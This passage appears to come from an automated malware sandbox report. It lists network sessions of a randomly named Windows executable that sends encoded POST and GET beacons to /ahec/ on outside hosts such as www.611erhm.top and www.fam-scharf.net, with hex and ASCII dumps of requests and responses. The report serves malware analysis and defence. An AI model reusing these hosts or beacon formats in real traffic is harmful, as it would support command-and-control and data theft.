                                                                          Data Raw: 4b 48 63 48 3d 5a 61 38 52 52 54 6d 44 7a 45 41 5a 64 65 62 42 73 5a 70 57 6a 4d 7a 66 45 6e 62 35 6b 77 76 34 33 4b 38 36 79 30 42 30 78 4b 42 6c 77 34 4e 36 6f 5a 55 6a 48 72 49 4f 6f 48 53 68 45 58 61 62 75 53 65 5a 42 48 76 6a 45 58 72 4a 35 48 33 6a 32 2f 57 62 4c 36 2f 32 64 75 66 79 59 50 47 35 4b 6c 57 49 63 56 6a 4b 76 45 70 59 31 59 48 39 4f 76 2f 34 35 73 46 68 48 52 4d 77 57 53 69 47 4f 77 62 67 6d 56 30 4f 39 62 61 39 35 67 76 35 69 50 71 32 71 70 6e 46 37 30 51 54 30 4e 73 59 69 58 65 66 69 79 4e 53 63 4c 31 72 79 6a 66 59 4e 42 33 49 59 63 56 6f 4e 30 30 4c 68 38 36 7a 31 54 4c 6e 68 63 49 3d
                                                                          Data Ascii: KHcH=Za8RRTmDzEAZdebBsZpWjMzfEnb5kwv43K86y0B0xKBlw4N6oZUjHrIOoHShEXabuSeZBHvjEXrJ5H3j2/WbL6/2dufyYPG5KlWIcVjKvEpY1YH9Ov/45sFhHRMwWSiGOwbgmV0O9ba95gv5iPq2qpnF70QT0NsYiXefiyNScL1ryjfYNB3IYcVoN00Lh86z1TLnhcI=
                                                                          Dec 2, 2023 18:49:44.772815943 CET230INHTTP/1.1 405 Method Not Allowed
                                                                          Server: nginx/1.20.2
                                                                          Date: Sat, 02 Dec 2023 17:49:44 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 157
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Dec 2, 2023 18:49:44.775960922 CET211INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          27192.168.2.54974634.117.26.57801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:49:47.106955051 CET1818OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.611erhm.top
                                                                          Origin: http://www.611erhm.top
                                                                          Referer: http://www.611erhm.top/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 5a 61 38 52 52 54 6d 44 7a 45 41 5a 64 65 62 42 73 5a 70 57 6a 4d 7a 66 45 6e 62 35 6b 77 76 34 33 4b 38 36 79 30 42 30 78 4b 5a 6c 78 4a 74 36 71 34 55 6a 47 72 49 4f 32 58 53 73 45 58 61 53 75 55 32 6a 42 48 54 7a 45 56 54 4a 34 6c 50 6a 68 2b 57 62 65 4b 2f 32 46 75 66 33 57 76 47 73 4b 68 36 4d 63 56 7a 4b 76 45 70 59 31 66 33 39 59 75 2f 34 71 63 46 69 58 68 4d 38 41 69 69 75 4f 77 53 59 6d 57 5a 37 39 72 36 39 34 41 2f 35 78 5a 2b 32 31 5a 6e 39 34 30 51 62 30 4e 68 61 69 52 36 74 69 79 49 33 63 4d 42 72 78 30 36 45 52 69 33 4d 4a 4b 35 2b 65 78 67 5a 35 62 4f 4b 6d 6d 50 43 69 6f 77 74 52 6d 57 43 2f 33 4b 7a 4e 38 48 65 64 6f 63 68 43 6b 55 46 36 58 63 49 6e 43 76 4b 35 79 48 4d 78 7a 32 53 51 32 54 70 62 4c 54 63 56 70 69 6e 5a 58 77 59 6d 77 2b 58 52 6d 46 56 56 34 43 4c 38 35 45 64 4b 37 34 66 54 67 66 65 73 2b 4c 72 44 5a 68 52 6f 73 68 70 5a 53 33 72 56 7a 64 2f 7a 30 76 2b 31 34 58 36 48 45 4e 65 6e 7a 47 38 56 72 74 55 44 63 43 72 79 44 70 43 52 50 62 75 34 49 6f 70 39 30 4e 49 4f 6f 4a 58 6b 69 50 34 46 6f 46 2f 61 66 49 59 51 2f 70 4c 44 38 36 36 49 44 30 4e 39 7a 79 2b 4c 4b 34 79 7a 58 5a 76 72 59 61 4f 33 6b 6a 37 69 30 43 54 39 44 6f 6c 54 77 4d 4d 65 37 49 54 34 6f 33 74 6d 30 36 43 56 56 41 79 64 74 45 68 45 4d 4d 78 76 4b 34 4c 72 50 6d 33 4b 66 41 63 6b 4a 79 6c 6a 6c 53 44 34 34 6f 72 34 56 75 43 37 59 30 66 68 77 2b 5a 4e 4d 4e 53 50 65 42 6a 48 67 75 64 51 65 57 68 36 7a 39 6d 35 32 64 58 44 61 35 6d 51 35 2b 30 2b 77 73 73 61 69 56 6b 43 68 31 6b 49 49 67 48 4d 4a 6f 50 44 71 33 4a 31 63 49 33 63 4a 44 35 69 72 63 38 6f 36 6c 67 54 33 48 63 70 58 64 65 65 31 38 4d 6e 30 49 52 6e 33 7a 4d 67 45 51 69 53 4e 44 48 6f 59 31 6a 33 59 79 69 32 35 32 38 58 6f 78 32 38 5a 41 38 69 4c 48 75 48 6d 51 66 72 53 32 37 51 64 4f 74 53 69 45 78 6a 67 54 58 71 42 69 66 53 5a 52 6e 53 67 46 74 56 53 67 49 4d 41 46 52 30 44 6d 53 33 78 2f 48 48 61 35 41 73 6a 45 31 50 4c 2b 47 74 74 62 6d 47 64 65 34 6b 59 4b 57 35 4e 42 36 37 42 38 38 62 59 70 5a 69 4b 4a 47 5a 66 33 58 73 32 4b 71 59 4e 49 34 4b 6b 2f 73 6f 63 58 35 42 62 55 6a 58 70 53 65 55 35 78 31 64 37 74 6b 69 6e 73 53 72 53 58 4e 4c 78 53 37 32 69 71 58 6d 41 37 4a 79 62 52 4e 47 50 4d 49 37 53 61 4c 79 36 4c 48 69 34 64 46 50 66 5a 52 6b 4a 34 43 67 59 55 69 64 57 4f 62 32 6e 52 44 65 64 6c 42 32 69 30 76 67 35 74 2f 48 6f 53 74 34 35 73 65 50 61 58 5a 43 61 31 57 58 2b 6b 35 76 64 52 48 48 6f 72 6b 35 44 63 70 64 6f 59 79 61 41 31 65 45 46 33 72 56 4a 74 44 2f 41 41 48 31 4c 49 55 39 63 4a 38 69 65 77 62 6c 45 6f 6a 54 41 56 46 77 4a 65 6f 56 6b 71 68 57 48 43 49 77 47 66 5a 71 48 74 69 32 57 62 5a 73 73 31 4b 4a 4a 45 78 31 59 35 6b 41 2f 49 49 59 63 63 6d 4e 4d 77 53 4f 63 77 79 38 76 70 6c 7a 63 5a 78 54 7a 44 44 76 30 51 49 7a 7a 51 48 4b 6a 4e 36 30 35 36 6e 4f 5a 38 59 4a 2b 70 73 68 2b 70 32 77 2f 43 38 42 31 75 59 41 50 49 37 4d 73 48 2f 4d 42 7a 53 4f 69 58 77 6c 34 59 39 78 58 56 35 65 47 6f 69 49 34 4c 42 2f 6e 57 63 78 72 70 76 4a 73 36 6d 44 53 47 57 56 50 45 2f 4e 6b 6e 32 4d 2f 6f 43 71 35 31 53 37 32 46 41 70 50 75 58 44 6c 79 72 31 43 36 59 68 4f 35 33 76 44 64 6b 45 53 5a 6b 71 33 75 44 66 32 35 68 76 56 5a 6f 72 69 62 4e 41 4d 72 2f 66 4f 6e 4d 4c 38 30 4b 76 52 6c 46 4b 5a 33 64 7a 4e 53 45 78 70 48 4f 76 32 32 4e 38 47 32 37 39 49 4b 67 54 55 52 4f 32 64 68 79 6d 4b 34 2b 6d 35 4d 77 35 4a 79 4e 61 2b 52 52 7a 6c 75 33 73 5a 72 44 77 51 49 44 66 57 36 75 48 6c 61 6d 4c 34 44 46 6d 59 32 67 65 67 6d 74 4c 30 34 74 6f 75 74 33 53 36 46 38 2b 52 74 6f 4e 69 50 4a 30 4a 47 69 34 69 47 56 4e 53 30 59 56 72 48 50 46 43 77 55 48 76 38 38 72 30 6f 70 4b 53 71 70 77 2f 63 4a 32 55 49 36
                                                                          Data Ascii: KHcH=Za8RRTmDzEAZdebBsZpWjMzfEnb5kwv43K86y0B0xKZlxJt6q4UjGrIO2XSsEXaSuU2jBHTzEVTJ4lPjh+WbeK/2Fuf3WvGsKh6McVzKvEpY1f39Yu/4qcFiXhM8AiiuOwSYmWZ79r694A/5xZ+21Zn940Qb0NhaiR6tiyI3cMBrx06ERi3MJK5+exgZ5bOKmmPCiowtRmWC/3KzN8HedochCkUF6XcInCvK5yHMxz2SQ2TpbLTcVpinZXwYmw+XRmFVV4CL85EdK74fTgfes+LrDZhRoshpZS3rVzd/z0v+14X6HENenzG8VrtUDcCryDpCRPbu4Iop90NIOoJXkiP4FoF/afIYQ/pLD866ID0N9zy+LK4yzXZvrYaO3kj7i0CT9DolTwMMe7IT4o3tm06CVVAydtEhEMMxvK4LrPm3KfAckJyljlSD44or4VuC7Y0fhw+ZNMNSPeBjHgudQeWh6z9m52dXDa5mQ5+0+wssaiVkCh1kIIgHMJoPDq3J1cI3cJD5irc8o6lgT3HcpXdee18Mn0IRn3zMgEQiSNDHoY1j3Yyi2528Xox28ZA8iLHuHmQfrS27QdOtSiExjgTXqBifSZRnSgFtVSgIMAFR0DmS3x/HHa5AsjE1PL+GttbmGde4kYKW5NB67B88bYpZiKJGZf3Xs2KqYNI4Kk/socX5BbUjXpSeU5x1d7tkinsSrSXNLxS72iqXmA7JybRNGPMI7SaLy6LHi4dFPfZRkJ4CgYUidWOb2nRDedlB2i0vg5t/HoSt45sePaXZCa1WX+k5vdRHHork5DcpdoYyaA1eEF3rVJtD/AAH1LIU9cJ8iewblEojTAVFwJeoVkqhWHCIwGfZqHti2WbZss1KJJEx1Y5kA/IIYccmNMwSOcwy8vplzcZxTzDDv0QIzzQHKjN6056nOZ8YJ+psh+p2w/C8B1uYAPI7MsH/MBzSOiXwl4Y9xXV5eGoiI4LB/nWcxrpvJs6mDSGWVPE/Nkn2M/oCq51S72FApPuXDlyr1C6YhO53vDdkESZkq3uDf25hvVZoribNAMr/fOnML80KvRlFKZ3dzNSExpHOv22N8G279IKgTURO2dhymK4+m5Mw5JyNa+RRzlu3sZrDwQIDfW6uHlamL4DFmY2gegmtL04tout3S6F8+RtoNiPJ0JGi4iGVNS0YVrHPFCwUHv88r0opKSqpw/cJ2UI6
                                                                          Dec 2, 2023 18:49:47.949619055 CET387INHTTP/1.1 405 Method Not Allowed
                                                                          Server: nginx/1.20.2
                                                                          Date: Sat, 02 Dec 2023 17:49:47 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 157
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          28192.168.2.54974734.117.26.57801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:49:49.732218027 CET515OUTGET /ahec/?KHcH=UYUxSke5jkUMcYDKg5c5qeCNAmjygCX5uaIG43dC5thZqMprvLUeD5Feo3aTVHSupyfrGHzleQTbxGW3puedJJLbH8mycsz0Gg==&Vjk=-N-tntX HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.611erhm.top
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:49:50.019200087 CET1340INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.2
                                                                          Date: Sat, 02 Dec 2023 17:49:49 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 5208
                                                                          Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT
                                                                          Vary: Accept-Encoding
                                                                          ETag: "65267254-1458"
                                                                          Cache-Control: no-cache
                                                                          Accept-Ranges: bytes
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 26 26 28 77 69 6e 64 6f 77 2e 77 70 6b 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 28 7b 62 69 64 3a 22 62 65 72 67 2d 64 6f 77 6e 6c 6f 61 64 22 2c 72 65 6c 3a 22 32 2e 34 32 2e 30 22 2c 73 61 6d 70 6c 65 52 61 74 65 3a 31 2c 70 6c 75 67 69 6e 73 3a 5b 5b 77 69 6e 64 6f 77 2e 77 70 6b 67 6c 6f 62 61 6c 65 72 72 6f 72 50 6c 75 67 69 6e 2c 7b 6a 73 45 72 72 3a 21 30 2c 6a 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 2c 72 65 73 45 72 72 3a 21 30 2c 72 65 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 7d 5d 2c 5b 77 69 6e 64 6f 77 2e 77 70 6b 70 65 72 66 6f 72 6d 61 6e 63 65 50 6c 75 67 69 6e 2c 7b 65 6e 61 62 6c 65 3a 21 30 2c 73 61 6d 70 6c 65 52 61 74 65 3a 2e 35 7d 5d 5d 7d 29 2c 77 69 6e 64 6f 77 2e 77 70 6b 2e 69 6e 73 74 61 6c 6c 28 29 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 42 61 69 64 75 48 6d 74 28 74 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 22 2c 74 29 3b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 22 2b 74 3b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e
                                                                          Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.42.0",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}function
                                                                          Dec 2, 2023 18:49:50.019222975 CET1340INData Raw: 20 62 61 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 73 68 28 5b 22 5f 74 72 61 63 6b 45 76 65 6e 74 22 2c 74 2c 65 2c 6f 5d 29 7d 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e5 8a a0 e8 bd bd e7 99 be e5 ba
                                                                          Data Ascii: baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,e,o])}console.log("..."),window._hmt=window._hmt||[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc";loadBaiduHmt(token)</script><script>function send
                                                                          Dec 2, 2023 18:49:50.019234896 CET1340INData Raw: 28 69 29 26 26 74 2e 70 75 73 68 28 22 22 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 69 29 2c 22 3d 22 29 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 5b 69 5d 29 29 29
                                                                          Data Ascii: (i)&&t.push("".concat(encodeURIComponent(i),"=").concat(encodeURIComponent(a[i])));var c=t.join("&").replace(/%20/g,"+"),s="".concat("https://track.uc.cn/collect","?").concat(c,"&").concat("uc_param_str=dsfrpfvedncpssntnwbipreimeutsv");(e()||r
                                                                          Dec 2, 2023 18:49:50.019247055 CET1340INData Raw: 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 2c 24 73 63 72 69 70 74 31 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 24 73
                                                                          Data Ascii: ument.getElementsByTagName("head")[0],$script1=document.createElement("script");$script1.setAttribute("crossorigin","anonymous"),$script1.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($sc
                                                                          Dec 2, 2023 18:49:50.019258976 CET418INData Raw: 6e 67 73 68 61 6e 2d 32 30 32 33 30 38 30 32 30 38 30 34 30 30 2e 65 78 65 22 29 27 3e e7 94 a8 20 e5 a4 b8 e5 85 8b e7 bd 91 e7 9b 98 20 e6 89 93 e5 bc 80 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72
                                                                          Data Ascii: ngshan-20230802080400.exe")'> </div></div><div class="footer" id="footer"><div></div><div class="no-ad"></div><div></div><div></div></


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          29192.168.2.54974881.169.145.70801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:49:55.481358051 CET794OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.fam-scharf.net
                                                                          Origin: http://www.fam-scharf.net
                                                                          Referer: http://www.fam-scharf.net/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 6b 46 37 56 6e 36 4f 46 30 59 58 72 55 62 62 59 39 72 31 46 58 65 48 2f 5a 37 4d 64 78 2b 33 55 61 48 51 37 6d 69 31 35 6f 54 61 6b 30 34 49 30 6f 74 65 63 42 52 53 73 75 61 4c 62 52 6f 54 68 76 54 6c 6a 53 36 48 5a 59 79 44 4a 54 47 35 79 37 58 52 74 46 57 56 43 53 49 65 30 45 6f 4a 76 62 79 44 51 6a 35 4c 6b 50 35 4c 72 74 36 57 42 71 44 41 5a 72 77 47 7a 64 61 75 79 72 58 37 37 4a 4d 48 30 4a 4e 4b 55 50 4d 49 37 5a 30 6d 62 6f 68 34 56 73 45 2b 77 33 35 4d 69 34 34 6c 54 35 75 76 53 63 75 36 6f 32 54 58 7a 4d 75 70 6c 4e 77 3d 3d
                                                                          Data Ascii: KHcH=kF7Vn6OF0YXrUbbY9r1FXeH/Z7Mdx+3UaHQ7mi15oTak04I0otecBRSsuaLbRoThvTljS6HZYyDJTG5y7XRtFWVCSIe0EoJvbyDQj5LkP5Lrt6WBqDAZrwGzdauyrX77JMH0JNKUPMI7Z0mboh4VsE+w35Mi44lT5uvScu6o2TXzMuplNw==
                                                                          Dec 2, 2023 18:49:55.686580896 CET428INHTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:49:55 GMT
                                                                          Server: Apache/2.4.58 (Unix)
                                                                          Content-Length: 196
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          30192.168.2.54974981.169.145.70801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:49:58.212608099 CET814OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.fam-scharf.net
                                                                          Origin: http://www.fam-scharf.net
                                                                          Referer: http://www.fam-scharf.net/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 6b 46 37 56 6e 36 4f 46 30 59 58 72 56 37 4c 59 75 62 4a 46 48 4f 48 38 48 72 4d 64 6a 2b 33 51 61 48 55 37 6d 68 35 50 72 68 4f 6b 30 5a 34 30 70 6f 79 63 47 52 53 73 67 36 4c 61 50 59 54 2f 76 54 70 72 53 36 37 5a 59 79 6e 4a 54 45 78 79 75 32 52 71 45 47 56 41 48 59 65 32 4b 49 4a 76 62 79 44 51 6a 35 65 42 50 35 54 72 74 75 71 42 71 69 41 61 33 67 47 38 61 61 75 79 34 48 37 2f 4a 4d 47 62 4a 4d 6d 2b 50 4f 67 37 5a 32 4f 62 70 7a 51 57 6c 45 2b 32 7a 35 4e 33 33 71 35 65 69 66 33 63 4b 4d 4c 2b 6c 6a 6a 6e 41 62 46 32 4b 46 52 62 74 63 4b 76 68 76 2f 52 52 66 2b 72 68 53 76 70 73 74 4d 3d
                                                                          Data Ascii: KHcH=kF7Vn6OF0YXrV7LYubJFHOH8HrMdj+3QaHU7mh5PrhOk0Z40poycGRSsg6LaPYT/vTprS67ZYynJTExyu2RqEGVAHYe2KIJvbyDQj5eBP5TrtuqBqiAa3gG8aauy4H7/JMGbJMm+POg7Z2ObpzQWlE+2z5N33q5eif3cKML+ljjnAbF2KFRbtcKvhv/RRf+rhSvpstM=
                                                                          Dec 2, 2023 18:49:58.418216944 CET428INHTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:49:58 GMT
                                                                          Server: Apache/2.4.58 (Unix)
                                                                          Content-Length: 196
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
